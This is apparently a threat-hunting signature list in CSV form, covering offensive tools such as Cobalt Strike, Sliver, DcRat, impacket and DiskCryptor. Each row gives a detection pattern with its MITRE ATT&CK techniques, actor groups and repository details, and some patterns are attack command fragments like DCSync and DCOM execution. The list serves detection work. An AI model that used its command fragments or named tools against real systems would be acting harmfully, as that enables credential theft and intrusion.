"*dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359*",".{0,1000}dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7*",".{0,1000}dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*dbGetNimplant*",".{0,1000}dbGetNimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87*",".{0,1000}dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44*",".{0,1000}dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5*",".{0,1000}dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*dc3c1af9-ea3d-4401-9158-eb6dda735276*",".{0,1000}dc3c1af9\-ea3d\-4401\-9158\-eb6dda735276.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*",".{0,1000}dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc*",".{0,1000}dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","0","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","0","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a*",".{0,1000}dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992*",".{0,1000}dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af*",".{0,1000}dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112*",".{0,1000}dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c*",".{0,1000}dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 
- T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA*",".{0,1000}DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*dccon.exe -encrypt2*",".{0,1000}dccon\.exe\s\-encrypt2.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201*",".{0,1000}dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36*",".{0,1000}dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell 
functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*dcenum.run*",".{0,1000}dcenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*dchrastil*",".{0,1000}dchrastil.{0,1000}","offensive_tool_keyword","Github Username","github user name hosting exploitation tools:hacker. scripting. recon. OSINT. automation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dchrastil","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--dc-ip *--check-user-access*",".{0,1000}\-\-dc\-ip\s.{0,1000}\-\-check\-user\-access.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" "*dcipher-cli*",".{0,1000}dcipher\-cli.{0,1000}","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. 
right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","3","226","30","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z" "*dcomexec -*",".{0,1000}dcomexec\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*dcomexec.py*",".{0,1000}dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dcomhijack.cna*",".{0,1000}dcomhijack\.cna.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*dcomhijack.py*",".{0,1000}dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*dcomhijack-main*",".{0,1000}dcomhijack\-main.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*DCOMPotato.*",".{0,1000}DCOMPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" 
"*DCOMPotato-master*",".{0,1000}DCOMPotato\-master.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*DCOMReflection.cpp*",".{0,1000}DCOMReflection\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*DcRat 1.0.7*",".{0,1000}DcRat\s\s1\.0\.7.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat.7z*",".{0,1000}DcRat\.7z.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat.exe*",".{0,1000}DcRat\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat.zip*",".{0,1000}DcRat\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat_png.png*",".{0,1000}DcRat_png\.png.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*DcRat-main.zip*",".{0,1000}DcRat\-main\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*dcrypt_bartpe.zip*",".{0,1000}dcrypt_bartpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcrypt_install.iss*",".{0,1000}dcrypt_install\.iss.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcrypt_setup_*.exe*",".{0,1000}dcrypt_setup_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" 
"*dcrypt_winpe.zip*",".{0,1000}dcrypt_winpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*dcsync -Domain*",".{0,1000}dcsync\s\-Domain.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*dcsync@protonmail.com*",".{0,1000}dcsync\@protonmail\.com.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*dcsync_inject*",".{0,1000}dcsync_inject.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*dcsyncattack(*",".{0,1000}dcsyncattack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" 
"*dcsyncattack.py*",".{0,1000}dcsyncattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dcsyncclient.*",".{0,1000}dcsyncclient\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 